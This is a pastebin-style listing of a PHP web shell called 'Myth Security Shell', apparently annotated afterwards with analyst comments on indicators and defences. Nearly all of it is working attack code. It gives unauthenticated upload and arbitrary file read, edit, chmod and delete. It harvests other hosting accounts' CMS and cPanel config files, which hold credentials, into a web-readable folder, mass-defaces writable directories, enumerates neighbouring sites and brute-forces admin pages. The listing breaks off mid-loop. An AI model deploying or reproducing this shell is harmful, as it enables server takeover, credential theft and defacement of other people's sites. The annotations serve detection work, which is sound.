Mr-Hichiko

Shell Mini MST

Jan 17th, 2018
  1. <?php
  // Analyst note: start-up of a PHP web shell sample. The script contains no login or token check;
  // every later branch is selected directly by $_GET / $_POST / $_FILES values.
  2. error_reporting(0); // turns off PHP error reporting, so failed file operations produce no error output
  3. set_time_limit(0); // removes the execution time limit (relevant to the long directory walks below)
  4. if(get_magic_quotes_gpc()){ // legacy API: deprecated in PHP 7.4, removed in PHP 8.0
  5. foreach($_POST as $key=>$value){
  6. $_POST[$key] = stripslashes($value); // undo magic-quote escaping so POSTed file content is written verbatim
  7. }
  8. }
  9. echo '<!DOCTYPE HTML>
  10. <html>
  11. <head>
  12. <link href="" rel="stylesheet" type="text/css">
  13. <title>MST Shell</title>
  14. <style>
  15. body{
  16. background-color: black;
  17. color:red;
  18. }
  19. #content tr:hover{
  20. background-color: red;
  21. text-shadow:0px 0px 10px #fff;
  22. }
  23. #content .first{
  24. background-color: navy;
  25. }
  26. table{
  27. border: 1px #000000 dotted;
  28. }
  29. a{
  30. color:white;
  31. text-decoration: none;
  32. }
  33. a:hover{
  34. color:red;
  35. text-shadow:0px 0px 10px #ffffff;
  36. }
  37. input,select,textarea{
  38. border: 2px #00ff00 dotted;
  39. -moz-border-radius: 5px;
  40. -webkit-border-radius:5px;
  41. border-radius:5px;
  42. }
  43. </style>
  44. </head>
  45. <body>
  46. <h1><tt><center><font color="red">Welcome<br>|
  47. Myth Security Shell|<br></font></center></h1></tt>
  48. <table width="700" border="0" cellpadding="3" cellspacing="1"
  49. align="center">
  50. <tr><td><font color="white">Path :</font> ';
  // Analyst note: working-directory selection and breadcrumb output. The directory comes straight
  // from the `path` query parameter with no base-directory restriction, so access-log entries for
  // this script carrying absolute filesystem paths in ?path= are a useful hunting indicator.
  51. if(isset($_GET['path'])){
  52. $path = $_GET['path']; // caller-chosen directory, used unvalidated by the upload and listing code
  53. }else{
  54. $path = getcwd(); // default: the directory the script runs in
  55. }
  56. $path = str_replace('\\','/',$path); // normalise Windows separators
  57. $paths = explode('/',$path);
  58. foreach($paths as $id=>$pat){
  59. if($pat == '' && $id == 0){ // leading empty segment means an absolute path
  60. $a = true;
  61. echo '<a href="?path=/">/</a>';
  62. continue;
  63. }
  64. if($pat == '') continue;
  65. echo '<a href="?path=';
  66. for($i=0;$i<=$id;$i++){
  67. echo "$paths[$i]"; // path segments are echoed without HTML escaping
  68. if($i != $id) echo "/";
  69. }
  70. echo '">'.$pat.'</a>/';
  71. }
  72. echo '</td></tr><tr><td>';
  // Analyst note: unauthenticated upload handler. The temporary upload is copied into $path under
  // the client-supplied filename; there is no extension, content-type or is_uploaded_file() check.
  // Detection: a multipart POST to this script followed by a new file in a web-served directory.
  // The two status strings below are literal output of this sample and can serve as response or
  // on-disk signatures.
  73. if(isset($_FILES['file'])){
  74. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']
  75. ['name'])){
  76. echo '<font color="green">Upload Berhasil brohh</font><br />';
  77. }else{
  78. echo '<font color="red">Upload Gagal</font><br/>';
  79. }
  80. }
  81. echo '<form enctype="multipart/form-data" method="POST">
  82. <font color="red">File Upload :</font> <input type="file"
  83. name="file" />
  84. <input type="submit" value="upload" />
  85. </form>
  86. </td></tr>';
  87. echo "<center><a href='?dir=$dir&do=finder'>[] Admin Finder
  88. [] |<a href='?dir=$dir&do=csrf'>[] CSRF Online [] | </a><a
  89. href='?dir=$dir&do=config'>[] Config [] | </a>
  90. <a href='?dir=$dir&do=mass_deface'>[] Mass Deface [] | </
  91. a><br><a href='?dir=$dir&do=jumping'>[] Jumping [] | </a><a
  92. href='/mini.php'>[] Home []</a>";
  93. if($_GET['do'] == 'csrf') {
  94. echo' <html>
  95. <title>CSRF EXPLOITER ONLINE</title>
  96. <center><br><br><br><br>
  97. <font color=red>Csrf By Mr.Hichiko
  98. <center>
  99. <form method="post">
  100. URL: <input type="text" name="url" size="50" height="10"
  101. placeholder="http://www.target.com/[path]/vuln.php"
  102. style="margin: 5px auto; padding-left: 5px;" required><br>
  103. POST File: <input type="text" name="pf" size="50" height="10"
  104. placeholder="Filedata / Fileupload / dzfile / files[] / qqfile /
  105. userfile / dll " style="margin: 5px auto; padding-left: 5px;"
  106. required><br>
  107. <input type="submit" name="d" value="Lock!">
  108. </form>';
  109. }
  // Analyst note (?do=config branch): reads /etc/passwd, derives an account name from each line,
  // and for every account whose /home/<user>/public_html/ is readable tries a fixed list of
  // application config paths, copying any non-empty file into a local drop directory.
  // Indicators visible in this block: a directory named 007_config, an .htaccess inside it with
  // the three directives below, and files named <user>-<label>.txt.
  // Defensive takeaway: the branch only yields data when this PHP process can read other
  // accounts' home directories, so per-account isolation and non-world-readable config files are
  // the relevant controls; credentials in any file copied here should be treated as exposed.
  110. if($_GET['do'] == 'config') {
  111. $etc = fopen("/etc/passwd", "r") or die("<pre><font
  112. color=red>Can't read /etc/passwd</font></pre>");
  113. $idx = mkdir("007_config", 0777); // drop directory, relative path, requested mode 0777
  114. $isi_htc = "Options all\nRequire None\nSatisfy Any"; // .htaccess body, written verbatim below
  115. $htc = fopen("007_config/.htaccess","w");
  116. fwrite($htc, $isi_htc);
  117. while($passwd = fgets($etc)) {
  118. if($passwd == "" || !$etc) {
  119. echo "<font color=red>Can't read /etc/passwd</font>";
  120. } else {
  121. preg_match_all('/(.*?):x:/', $passwd, $user_config); // account name = text before ":x:"
  122. foreach($user_config[1] as $user_idx) {
  123. $user_config_dir = "/home/$user_idx/public_html/";
  124. if(is_readable($user_config_dir)) { // gate: only accounts whose web root this process can read
  // Candidate path => label used in the output filename (hosting-panel and common CMS config files).
  125. $grab_config = array(
  126. "/home/$user_idx/.my.cnf" => "cpanel",
  127. "/home/$user_idx/.accesshash" => "WHM-
  128. accesshash",
  129. "/home/$user_idx/public_html/po-content/
  130. config.php" => "Popoji",
  131. "/home/$user_idx/public_html/vdo_config.php"
  132. => "Voodoo",
  133. "/home/$user_idx/public_html/bw-configs/
  134. config.ini" => "BosWeb",
  135. "/home/$user_idx/public_html/config/
  136. koneksi.php" => "Lokomedia",
  137. "/home/$user_idx/public_html/lokomedia/
  138. config/koneksi.php" => "Lokomedia",
  139. "/home/$user_idx/public_html/clientarea/
  140. configuration.php" => "WHMCS",
  141. "/home/$user_idx/public_html/whm/
  142. configuration.php" => "WHMCS",
  143. "/home/$user_idx/public_html/whmcs/
  144. configuration.php" => "WHMCS",
  145. "/home/$user_idx/public_html/forum/
  146. config.php" => "phpBB",
  147. "/home/$user_idx/public_html/sites/default/
  148. settings.php" => "Drupal",
  149. "/home/$user_idx/public_html/config/
  150. settings.inc.php" => "PrestaShop",
  151. "/home/$user_idx/public_html/app/etc/
  152. local.xml" => "Magento",
  153. "/home/$user_idx/public_html/joomla/
  154. configuration.php" => "Joomla",
  155. "/home/$user_idx/public_html/
  156. configuration.php" => "Joomla",
  157. "/home/$user_idx/public_html/wp/wp-
  158. config.php" => "WordPress",
  159. "/home/$user_idx/public_html/wordpress/wp-
  160. config.php" => "WordPress",
  161. "/home/$user_idx/public_html/wp-config.php"
  162. => "WordPress",
  163. "/home/$user_idx/public_html/admin/
  164. config.php" => "OpenCart",
  165. "/home/$user_idx/public_html/slconfig.php" =>
  166. "Sitelok",
  167. "/home/$user_idx/public_html/application/
  168. config/database.php" => "Ellislab");
  169. foreach($grab_config as $config => $nama_config) {
  // A failed read returns false, which compares equal to '' here, so unreadable paths are skipped.
  170. $ambil_config = file_get_contents($config);
  171. if($ambil_config == '') {
  172. } else {
  173. $file_config = fopen("007_config/$user_idx-$
  174. nama_config.txt","w");
  175. fputs($file_config,$ambil_config); // copied content lands under the web-served drop directory
  176. }
  177. }
  178. }
  179. }
  180. }
  181. }
  182. echo "<center><a href='?dir=$dir/007_config'><font
  183. color=red>Done</font></a></center>";
  184. }
  185. if($_GET['do'] == 'mass_deface') {
  // Analyst note: recursive mass-overwrite helper. For each scandir() entry of $dir it writes
  // $isi_script to <entry>/$namafile. scandir() also returns '.' and '..', so the file is written
  // into $dir itself and into its parent directory as well; writable subdirectories are then
  // processed recursively. All three arguments arrive from POST fields at the call site.
  // Detection: the same filename with identical content appearing across many sibling directories
  // within a short window. File-integrity monitoring and web roots that the PHP user cannot write
  // to limit the impact; recovery is a restore from known-good backups.
  186. function sabun_massal($dir,$namafile,$isi_script) {
  187. if(is_writable($dir)) {
  188. $dira = scandir($dir);
  189. foreach($dira as $dirb) {
  190. $dirc = "$dir/$dirb";
  191. $lokasi = $dirc.'/'.$namafile;
  192. if($dirb === '.') {
  193. file_put_contents($lokasi, $isi_script); // resolves to $dir/$namafile
  194. } elseif($dirb === '..') {
  195. file_put_contents($lokasi, $isi_script); // resolves to the parent of $dir
  196. } else {
  197. if(is_dir($dirc)) {
  198. if(is_writable($dirc)) {
  199. echo "[<font color=red>DONE</font>] $
  200. lokasi<br>";
  201. file_put_contents($lokasi, $isi_script);
  202. $idx = sabun_massal($dirc,$namafile,$isi_script); // descend into the subdirectory
  203. }
  204. }
  205. }
  206. }
  207. }
  208. }
  // Analyst note: single-level variant of the overwrite helper. It writes $isi_script to
  // $namafile in $dir (via the '.' entry), in the parent of $dir (via '..'), and in each writable
  // immediate subdirectory; it does not recurse. The "[DONE]" line printed per directory is
  // literal output of this sample.
  209. function sabun_biasa($dir,$namafile,$isi_script) {
  210. if(is_writable($dir)) {
  211. $dira = scandir($dir);
  212. foreach($dira as $dirb) {
  213. $dirc = "$dir/$dirb";
  214. $lokasi = $dirc.'/'.$namafile;
  215. if($dirb === '.') {
  216. file_put_contents($lokasi, $isi_script); // resolves to $dir/$namafile
  217. } elseif($dirb === '..') {
  218. file_put_contents($lokasi, $isi_script); // resolves to the parent of $dir
  219. } else {
  220. if(is_dir($dirc)) {
  221. if(is_writable($dirc)) {
  222. echo "[<font color=red>DONE</font>] $dirb/$
  223. namafile<br>";
  224. file_put_contents($lokasi, $isi_script);
  225. }
  226. }
  227. }
  228. }
  229. }
  230. }
  231. if($_POST['start']) {
  232. if($_POST['tipe_sabun'] == 'mahal') {
  233. echo "<div style='margin: 5px auto; padding: 5px'>";
  234. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  235. echo "</div>";
  236. } elseif($_POST['tipe_sabun'] == 'murah') {
  237. echo "<div style='margin: 5px auto; padding: 5px'>";
  238. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST
  239. ['script']);
  240. echo "</div>";
  241. }
  242. } else {
  243. echo "<center>";
  244. echo "<form method='post'>
  245. <font style='text-decoration: underline;'>Type/
  246. font><br>
  247. <input type='radio' name='tipe_sabun' value='murah'
  248. checked>Biasa<input type='radio' name='type'
  249. value='mahal'>Massal<br>
  250. <font style='text-decoration: underline;'>Folder:</font><br>
  251. <input type='text' name='d_dir' value='$dir' style='width:
  252. 450px;' height='10'><br>
  253. <font style='text-decoration: underline;'>Filename:</
  254. font><br>
  255. <input type='text' name='d_file' value='index.php'
  256. style='width: 450px;' height='10'><br>
  257. <font style='text-decoration: underline;'>Index File:</
  258. font><br>
  259. <textarea name='script' style='width: 450px; height:
  260. 200px;'>PCT Shell Code</textarea><br>
  261. <input type='submit' name='start' value='Mass Deface'
  262. style='width: 450px;'>
  263. </form></center>";
  264. }
  265. }
  266. if($_GET['do'] == 'jumping') {
  267. $i = 0;
  268. echo "<div class='margin: 5px auto;'>";
  269. if(preg_match("/hsphere/", $dir)) {
  270. $urls = explode("\r\n", $_POST['url']);
  271. if(isset($_POST['jump'])) {
  272. echo "<pre>";
  273. foreach($urls as $url) {
  274. $url = str_replace(array("http://","www."), "",
  275. strtolower($url));
  276. $etc = "/etc/passwd";
  277. $f = fopen($etc,"r");
  278. while($gets = fgets($f)) {
  279. $pecah = explode(":", $gets);
  280. $user = $pecah[0];
  281. $dir_user = "/hsphere/local/home/$user";
  282. if(is_dir($dir_user) === true) {
  283. $url_user = $dir_user."/".$url;
  284. if(is_readable($url_user)) {
  285. $i++;
  286. $jrw = "[<font color=red>R</font>] <a href='?
  287. dir=$url_user'><font color=lavender>$url_user</font></a>";
  288. if(is_writable($url_user)) {
  289. $jrw = "[<font color=red>RW</font>] <a
  290. href='?dir=$url_user'><font color=lavender>$url_user</font></
  291. a>";
  292. }
  293. echo $jrw."<br>";
  294. }
  295. }
  296. }
  297. }
  298. if($i == 0) {
  299. } else {
  300. echo "<br>Total ada ".$i." Kamar di ".$ip;
  301. }
  302. echo "</pre>";
  303. } else {
  304. echo '<center>
  305. <form method="post">
  306. List Domains: <br>
  307. <textarea name="url" style="width: 500px; height:
  308. 250px;">';
  309. $fp = fopen("/hsphere/local/config/httpd/sites/
  310. sites.txt","r");
  311. while($getss = fgets($fp)) {
  312. echo $getss;
  313. }
  314. echo '</textarea><br>
  315. <input type="submit" value="Jumping" name="jump"
  316. style="width: 500px; height: 25px;">
  317. </form></center>';
  318. }
  319. } elseif(preg_match("/vhosts/", $dir)) {
  320. $urls = explode("\r\n", $_POST['url']);
  321. if(isset($_POST['jump'])) {
  322. echo "<pre>";
  323. foreach($urls as $url) {
  324. $web_vh = "/var/www/vhosts/$url/httpdocs";
  325. if(is_dir($web_vh) === true) {
  326. if(is_readable($web_vh)) {
  327. $i++;
  328. $jrw = "[<font color=red>R</font>] <a href='?
  329. dir=$web_vh'><font color=gold>$web_vh</font></a>";
  330. if(is_writable($web_vh)) {
  331. $jrw = "[<font color=red>RW</font>] <a
  332. href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  333. }
  334. echo $jrw."<br>";
  335. }
  336. }
  337. }
  338. if($i == 0) {
  339. } else {
  340. echo "<br>Total ada ".$i." Kamar di ".$ip;
  341. }
  342. echo "</pre>";
  343. } else {
  344. echo '<center>
  345. <form method="post">
  346. List Domains: <br>
  347. <textarea name="url" style="width: 500px; height:
  348. 250px;">';
  349. bing("ip:$ip");
  350. echo '</textarea><br>
  351. <input type="submit" value="Jumping" name="jump"
  352. style="width: 500px; height: 25px;">
  353. </form></center>';
  354. }
  355. } else {
  356. echo "<pre>";
  357. $etc = fopen("/etc/passwd", "r") or die("<font
  358. color=red>Can't read /etc/passwd</font>");
  359. while($passwd = fgets($etc)) {
  360. if($passwd == '' || !$etc) {
  361. echo "<font color=red>Can't read /etc/passwd</
  362. font>";
  363. } else {
  364. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  365. foreach($user_jumping[1] as $user_idx_jump) {
  366. $user_jumping_dir = "/home/$user_idx_jump/
  367. public_html";
  368. if(is_readable($user_jumping_dir)) {
  369. $i++;
  370. $jrw = "[<font color=red>R</font>] <a href='?
  371. dir=$user_jumping_dir'><font color=lavender>$user_jumping_
  372. dir</font></a>";
  373. if(is_writable($user_jumping_dir)) {
  374. $jrw = "[<font color=red>RW</font>] <a
  375. href='?dir=$user_jumping_dir'><font color=lavender>$user_
  376. jumping_dir</font></a>";
  377. }
  378. echo $jrw;
  379. if(function_exists('posix_getpwuid')) {
  380. $domain_jump = file_get_contents("/etc/
  381. named.conf");
  382. if($domain_jump == '') {
  383. echo " => ( <font color=red>gabisa ambil
  384. nama domain nya</font> )<br>";
  385. } else {
  386. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  387. foreach($domains_jump[1] as $dj) {
  388. $user_jumping_url = posix_getpwuid(@ fileowner("/etc/valiases/$dj"));
  389. $user_jumping_url = $user_jumping_url
  390. ['name'];
  391. if($user_jumping_url == $user_idx_jump) {
  392. echo " => ( <u>$dj</u> )<br>";
  393. break;
  394. }
  395. }
  396. }
  397. } else {
  398. echo "<br>";
  399. }
  400. }
  401. }
  402. }
  403. }
  404. if($i == 0) {
  405. } else {
  406. echo "<br>Total ada ".$i." Kamar di ".$ip;
  407. }
  408. echo "</pre>";
  409. }
  410. echo "</div>";
  411. }if($_GET['do'] == 'finder') {
  412. echo '<html>
  413. <head>
  414. <title>Admin Finder By Myth Security Team</title>
  415. </head>
  416. <body bgcolor="blue">
  417. <center><font color="red"><tt>
  418. <h1>FIND YOUR ADMIN PAGE!!</h1>
  419. <p
  420. >******************************************************************
  421. ****************************************************</p>
  422. <p>THIS TO.oL W4S C0DED By Myth Security Team</p>
  423. <p>Special Thanks To My Team)</b><b></b></p>
  424. <p>Sebelum menggunakan Tool Ini,, Baca Bissmillah Dulu ya bro Dan
  425. Pastikan Anda Memiliki Wajah Tampan Dan Sadar diri :P :-D
  426. (18/1/2018)</p>
  427. <p
  428. >******************************************************************
  429. ****************************************************</p>
  430. <br>
  431. <br>
  432. <form method ="POST" action ="<?php $PHP_SELF; ?>">
  433. <p>Masukkan Target (Tanpa tanda "/" diakhir url target) :</
  434. p><input type="text" size="70" name="url" value="http://
  435. target.com/"/>
  436. <br>
  437. <input type="submit" name="submit" value="Cari Admin Disini bro:-D"/>
  438. <br>
  439. <br>';
  // Analyst note: output-encoding helper applied to the admin-finder URL field. It HTML-encodes
  // $data with htmlentities(ENT_QUOTES); when $data contains "script" (case-insensitive check),
  // the lowercase literal "script" in the encoded text is split with an empty <b></b> pair.
  // NOTE(review): the strip_tags() call reads $dara, which is never assigned in this function.
  // The misspelling may be usable as a fingerprint when matching copies of this paste.
  440. function xss_protect($data, $strip_tags = false, $allowed_tags =""){
  441. if($strip_tags){
  442. $data = strip_tags($dara, $allowed_tags. "<b>");
  443. }
  444. if(stripos($data, "script") !== false){
  445. $result = str_replace
  446. ("script","scr<b></b>ipt",htmlentities($data, ENT_QUOTES));
  447. }else{
  448. $result = htmlentities($data, ENT_QUOTES);
  449. }
  450. return $result;
  451. }
  // Analyst note: existence probe used by the admin-finder loop. It issues a body-less request
  // (CURLOPT_NOBODY) to $url and returns the curl_exec() result; with CURLOPT_FAILONERROR set,
  // HTTP status codes of 400 and above count as failure. Returns false if the handle cannot be
  // created.
  // On the probed site this appears as a rapid series of requests for admin and login style paths
  // from a single source, most of them answered with 404; rate limiting and alerting on such
  // bursts are the usual countermeasures.
  452. function urlExist($url){
  453. $handle = curl_init($url);
  454. if(false === $handle)
  455. {
  456. return false;
  457. }
  458. curl_setopt($handle, CURLOPT_HEADER, false);
  459. curl_setopt($handle, CURLOPT_FAILONERROR, true);
  // NOTE(review): this array is passed to CURLOPT_HEADER, which is not a header-setting option,
  // so the User-Agent string below is probably not what the probed server logs. Do not rely on
  // it as a network indicator without confirming against captured traffic.
  460. curl_setopt($handle, CURLOPT_HEADER, array("User-Agent:
  461. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15)
  462. Gecko/20080623 Firefox/2.0.0.15"));
  463. curl_setopt($handle, CURLOPT_NOBODY, true);
  464. curl_setopt($handle, CURLOPT_RETURNTRANSFER, false); // curl_exec() then returns true/false rather than the response
  465. $connectable = curl_exec($handle);
  466. curl_close($handle);
  467. return $connectable;
  468. }
  469. if(isset($_POST['url']))
  470. {
  471. $url = htmlentities(xss_protect($_POST['url']));
  472. if(filter_var($url, FILTER_VALIDATE_URL))
  473. {
  474. $trying = array
  475. ("admin","administrator","adm","login","login.php","administrator.
  476. php","admins.php","logins","admincp",
  477. "admincp.php","admin1.php", "admin1.html", "admin2.php",
  478. "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php",
  479. "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php",
  480. "maintenance/", "webmaster/", "adm/", "configuration/",
  481. "configure/", "websvn/", "admin/", "admin/account.php",
  482. "admin/account.html". "admin/index.php", "admin/index.html",
  483. "admin/login.php","admin/login.html", "admin/home.php",
  484. "admin/controlpanel.html", "admin/controlpanel.php",
  485. "admin.php", "admin.html", "admin/cp.php", "admin/cp.html",
  486. "cp.php", "cp.html", "administrator/","administrator/
  487. index.html", "administrator/index.php", "administrator/
  488. login.html", "administrator/login.php", "administrator/
  489. account.html", "administrator/account.php",
  490. "administrator.php","administrator.html", "login.php",
  491. "login.html", "modelsearch/login.php", "moderator.php",
  492. "moderator.html", "moderator/login.php", "moderator/
  493. login.html","moderator/admin.php","moderator/admin.html",
  494. "moderator/", "account.php", "account.html", "controlpanel/",
  495. "controlpanel.php", "controlpanel.html", "admincontrol.php",
  496. "admincontrol.html", "adminpanel.php","adminpanel.html",
  497. "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp",
  498. "admin/account.asp", "admin/index.asp", "admin/login.asp",
  499. "admin/home.asp", "admin/controlpanel.asp", "admin.asp",
  500. "admin/cp.asp", "cp.asp", "administrator/
  501. index.asp","administrator/login.asp","administrator/
  502. account.asp","administrator.asp", "login.asp", "modelsearch/
  503. login.asp", "moderator.asp","moderator/login.asp",
  504. "moderator/admin.asp", "account.asp", "controlpanel.asp",
  505. "admincontrol.asp", "adminpanel.asp", "fileadmin/",
  506. "fileadmin.php", "fileadmin.asp",
  507. "fileadmin.html","administration/", "administration.php",
  508. "administration.html", "sysadmin.php", "sysadmin.html",
  509. "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-
  510. admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/",
  511. "Server.php", "Server.html", "Server.asp", "Server/", "wp-
  512. admin/", "administr8.php", "administr8.html", "administr8/",
  513. "administr8.asp", "webadmin/",
  514. "webadmin.php","webadmin.asp", "webadmin.html",
  515. "administratie/", "admins/", "admins.php", "admins.asp",
  516. "admins.html", "administrivia/", "Database_Administration/",
  517. "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-
  518. administration/", "administrators/", "pgadmin/",
  519. "directadmin/", "staradmin/", "ServerAdministrator/",
  520. "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/",
  521. "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_
  522. login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/",
  523. "support_login/", "meta_login/", "manuallogin/",
  524. "simpleLogin/", "loginflat/","utility_login/", "showlogin/",
  525. "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-
  526. login/", "login1/", "dir-login/", "login_db/", "xlogin/",
  527. "smblogin/", "customer_login/", "UserLogin/","login-us/",
  528. "acct_login/", "admin_area/", "bigadmin/", "project-admins/",
  529. "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/",
  530. "openvpnadmin/", "wizmysqladmin/", "vadmind/",
  531. "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/",
  532. "adminpro/", "Lotus_Domino_Admin/", "bbadmin/",
  533. "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-
  534. macadmin/","banneradmin/","sshadmin/","phpldapadmin/","
  535. macadmin/","administratoraccounts/", "admin4_
  536. account/","admin4_
  537. colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/"
  538. ,"SysAdmin2/","globes_
  539. admin/","cadmins/","phpSQLiteAdmin/",
  540. "navSiteAdmin/","server_admin_small/","logo_
  541. sysadmin/","server/","database_administration/","power_
  542. user/", "system_administration/", "ss_vms_admin_sm/");
  543. foreach($trying as $sec)
  544. {
  545. $urll = $url.'/'.$sec;
  546. if(urlExist($urll))
  547. {
  548. echo '<p><font
  549. color="00ff00"'.$urll.' exists.<br>PAGE FOUND!!!</p></font>';
  550. exit;
  551. }else
  552. {
  553. echo '<p><font
  554. color="red">'.$urll.' does not exist.</font></p>';
  555. }
  556. }
  557. echo '<p><font color="red">Could not find admin
  558. page.</font></p>';
  559. }
  560. else
  561. {
  562. echo '<p><font color="red">Invalid
  563. URL entered.</font></p>';
  564. }
  565. }
  566. echo '</body>
  567. </html>';
  568. }
  569. if(isset($_GET['filesrc'])){
  570. echo "<tr><td>Current File : ";
  571. echo $_GET['filesrc'];
  572. echo '</tr></td></table><br />';
  573. echo('<pre>'.htmlspecialchars(file_get_contents($_GET
  574. ['filesrc'])).'</pre>');
  575. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  576. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  // Analyst note: file-operation dispatcher (chmod / rename / edit), selected by the POST field
  // `opt`. Each operation acts on the POST field `path` with no authentication and no restriction
  // to a base directory, so any file the PHP user can modify is in scope.
  // Detection: POST bodies to this script carrying opt=chmod, opt=rename or opt=edit together with
  // a filesystem path; the listing forms elsewhere in this script submit them to ?option&path=...
  // The Indonesian status strings below are literal output of this sample.
  577. if($_POST['opt'] == 'chmod'){
  578. if(isset($_POST['perm'])){
  579. if(chmod($_POST['path'],$_POST['perm'])){ // permission value taken as-is from the form
  580. echo '<font color="green">Horee Ubah Permission Berhasil</
  581. font><br/>';
  582. }else{
  583. echo '<font color="red">Ubah Permission Gagal</
  584. font><br />';
  585. }
  586. }
  587. echo '<form method="POST">
  588. Permission : <input name="perm" type="text" size="4"
  589. value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  590. <input type="hidden" name="path" value="'.$_POST['path'].'">
  591. <input type="hidden" name="opt" value="chmod">
  592. <input type="submit" value="Meluncur" />
  593. </form>';
  594. }elseif($_POST['opt'] == 'rename'){
  595. if(isset($_POST['newname'])){
  596. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ // new name is joined to $path unvalidated
  597. echo '<font color="green">Ganti Nama Berhasil</
  598. font><br/>';
  599. }else{
  600. echo '<font color="red">Ganti Nama Gagal</
  601. font><br />';
  602. }
  603. $_POST['name'] = $_POST['newname'];
  604. }
  605. echo '<form method="POST">
  606. New Name : <input name="newname" type="text" size="20"
  607. value="'.$_POST['name'].'" />
  608. <input type="hidden" name="path" value="'.$_POST['path'].'">
  609. <input type="hidden" name="opt" value="rename">
  610. <input type="submit" value="Meluncur" />
  611. </form>';
  612. }elseif($_POST['opt'] == 'edit'){
  613. if(isset($_POST['src'])){
  614. $fp = fopen($_POST['path'],'w'); // opens the target for writing, truncating existing content
  615. if(fwrite($fp,$_POST['src'])){ // replaces the file with the POSTed `src` field
  616. echo '<font color="green">Berhasil Edit File</font><br/
  617. >';
  618. }else{
  619. echo '<font color="red">Gagal Edit File</font><br/>';
  620. }
  621. fclose($fp);
  622. }
  623. echo '<form method="POST">
  624. <textarea cols=80 rows=20 name="src">'.htmlspecialchars
  625. (file_get_contents($_POST['path'])).'</textarea><br />
  626. <input type="hidden" name="path" value="'.$_POST['path'].'">
  627. <input type="hidden" name="opt" value="edit">
  628. <input type="submit" value="Simpan" />
  629. </form>';
  630. }
  631. echo '</center>';
  632. }else{
  633. echo '</table><br/><center>';
  // Analyst note: delete handler. When the request carries ?option and the POST field opt=delete,
  // the POST field `path` is passed to rmdir() (type=dir) or unlink() (type=file) with no
  // confirmation and no base-directory restriction. Unexplained removals of files owned by the
  // web server account, correlated with POSTs to this script, are the corresponding evidence.
  634. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  635. if($_POST['type'] == 'dir'){
  636. if(rmdir($_POST['path'])){
  637. echo '<font color="green">Horee Directory Terhapus</
  638. font><br/>';
  639. }else{
  640. echo '<font color="red">Directory Gagal Terhapus
  641. </font><br/>';
  642. }
  643. }elseif($_POST['type'] == 'file'){
  644. if(unlink($_POST['path'])){
  645. echo '<font color="green">Horee File Terhapus</font><br/>';
  646. }else{
  647. echo '<font color="red">File Gagal Dihapus</font><br/
  648. >';
  649. }
  650. }
  651. }
  652. echo '</center>';
  653. $scandir = scandir($path);
  654. echo '<div id="content"><table width="700" border="0"
  655. cellpadding="3" cellspacing="1" align="center">
  656. <tr class="first">
  657. <td><center>Name</peller></center></td>
  658. <td><center>Size</peller></center></td>
  659. <td><center>Permission</peller></center></td>
  660. <td><center>Modify</peller></center></td>
  661. </tr>';
  662. foreach($scandir as $dir){
  663. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  664. echo '<tr>
  665. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  666. <td><center>--</center></td>
  667. <td><center>';
  668. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  669. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  670. echo perms($path.'/'.$dir);
  671. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir))
  672. echo '</font>';
  673. echo '</center></td>
  674. <td><center><form method="POST" action="?option&path='.$path.'">
  675. <select name="opt">
  676. <option value="">Select</option>
  677. <option value="delete">Delete</option>
  678. <option value="chmod">Chmod</option>
  679. <option value="rename">Rename</option>
  680. </select>
  681. <input type="hidden" name="type" value="dir">
  682. <input type="hidden" name="name" value="'.$dir.'">
  683. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  684. <input type="submit" value="Sikat!!">
  685. </form></center></td>
  686. </tr>';
  687. }
  688. echo '<tr class="first"><td></td><td></td><td></td><td></
  689. td></tr>';
  690. foreach($scandir as $file){
  691. if(!is_file($path.'/'.$file)) continue;
  692. $size = filesize($path.'/'.$file)/1024;
  693. $size = round($size,3);
  694. if($size >= 1024){
  695. $size = round($size/1024,2).' MB';
  696. }else{
  697. $size = $size.' KB';
  698. }
  699. echo '<tr>
  700. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</
  701. a></td>
  702. <td><center>'.$size.'</center></td>
  703. <td><center>';
  704. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  705. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  706. echo perms($path.'/'.$file);
  707. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file))
  708. echo '</font>';
  709. echo '</center></td>
  710. <td><center><form method="POST" action="?option&path='.$path.'">
  711. <select name="opt">
  712. <option value="">Select</option>
  713. <option value="delete">Delete</option>
  714. <option value="chmod">Chmod</option>
  715. <option value="rename">Rename</option>
  716. <option value="edit">Edit</option>
  717. </select>
  718. <input type="hidden" name="type" value="file">
  719. <input type="hidden" name="name" value="'.$file.'">
  720. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  721. <input type="submit" value="Sikat!!">
  722. </form></center></td>
  723. </tr>';
  724. }
